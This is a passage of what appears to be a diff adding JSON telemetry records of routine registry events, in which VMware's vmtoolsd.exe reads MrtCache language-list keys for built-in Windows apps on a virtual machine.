"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri", + "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri", + "timestamp": 131883570937460000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri\\1d3d23f8efa53f1\\a01460c8", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri\\1d3d23f8efa53f1\\a01460c8\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570937460000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CShellExperienceHost_cw5n1h2txyewy%5Cresources.pri", + "registry_value": "C:%5CWindows%5CSystemApps%5CShellExperienceHost_cw5n1h2txyewy%5Cresources.pri", + "timestamp": 131883570938080000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CShellExperienceHost_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9079405c\\a01460c8", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CShellExperienceHost_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9079405c\\a01460c8\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570938080000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsAlarms_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsAlarms_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "timestamp": 131883570938550000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsAlarms_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5cbce6f20a\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsAlarms_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5cbce6f20a\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570938710000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "timestamp": 131883570939180000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570939180000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCamera_2018.824.60.0_x64__8wekyb3d8bbwe%5Cresources.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCamera_2018.824.60.0_x64__8wekyb3d8bbwe%5Cresources.pri", + "timestamp": 131883570939650000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCamera_2018.824.60.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d7283a095\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCamera_2018.824.60.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d7283a095\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570939650000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5Cmicrosoft.windowscommunicationsapps_16005.11001.20106.0_x64__8wekyb3d8bbwe%5Cresources.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5Cmicrosoft.windowscommunicationsapps_16005.11001.20106.0_x64__8wekyb3d8bbwe%5Cresources.pri", + "timestamp": 131883570940430000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5Cmicrosoft.windowscommunicationsapps_16005.11001.20106.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d2980fb18\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5Cmicrosoft.windowscommunicationsapps_16005.11001.20106.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d2980fb18\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570940430000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsFeedbackHub_1.1805.2331.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsFeedbackHub_1.1805.2331.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", + "timestamp": 131883570941050000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsFeedbackHub_1.1805.2331.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5d8c844891\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsFeedbackHub_1.1805.2331.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5d8c844891\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570941050000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsMaps_5.1811.3233.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsMaps_5.1811.3233.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "timestamp": 131883570941520000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsMaps_5.1811.3233.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d3750ccf4\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsMaps_5.1811.3233.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d3750ccf4\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570941520000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsPhone_10.1802.311.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsPhone_10.1802.311.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", + "timestamp": 131883570942150000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsPhone_10.1802.311.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b594531da9e\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsPhone_10.1802.311.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b594531da9e\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570942150000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsSoundRecorder_10.1809.2731.0_x64__8wekyb3d8bbwe%5Cresources.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsSoundRecorder_10.1809.2731.0_x64__8wekyb3d8bbwe%5Cresources.pri", + "timestamp": 131883570942619984, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsSoundRecorder_10.1809.2731.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d492a8eca\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsSoundRecorder_10.1809.2731.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d492a8eca\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570942619984, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsStore_11810.1001.12.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsStore_11810.1001.12.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", + "timestamp": 131883570943240000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsStore_11810.1001.12.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5d5ed8621\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsStore_11810.1001.12.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5d5ed8621\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570943400000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Xbox.TCUI_1.11.28003.0_x64__8wekyb3d8bbwe%5Cresources.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Xbox.TCUI_1.11.28003.0_x64__8wekyb3d8bbwe%5Cresources.pri", + "timestamp": 131883570943869984, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Xbox.TCUI_1.11.28003.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d3d24015d40ec6\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Xbox.TCUI_1.11.28003.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d3d24015d40ec6\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570943869984, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri", + "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri", + "timestamp": 131883570944960000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed99b68f26\\a01460c8", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed99b68f26\\a01460c8\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570944960000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.XboxSpeechToTextOverlay_1.21.13002.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.XboxSpeechToTextOverlay_1.21.13002.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", + "timestamp": 131883570946369984, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.XboxSpeechToTextOverlay_1.21.13002.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5c9ee9ce45\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.XboxSpeechToTextOverlay_1.21.13002.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5c9ee9ce45\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570946369984, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.ZuneMusic_10.18102.10531.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.ZuneMusic_10.18102.10531.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", + "timestamp": 131883570946680000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.ZuneMusic_10.18102.10531.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5c8a574905\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.ZuneMusic_10.18102.10531.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5c8a574905\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570946680000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.ZuneVideo_10.18082.13811.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.ZuneVideo_10.18082.13811.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", + "timestamp": 131883570946990000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.ZuneVideo_10.18082.13811.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5d11cfb971\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram 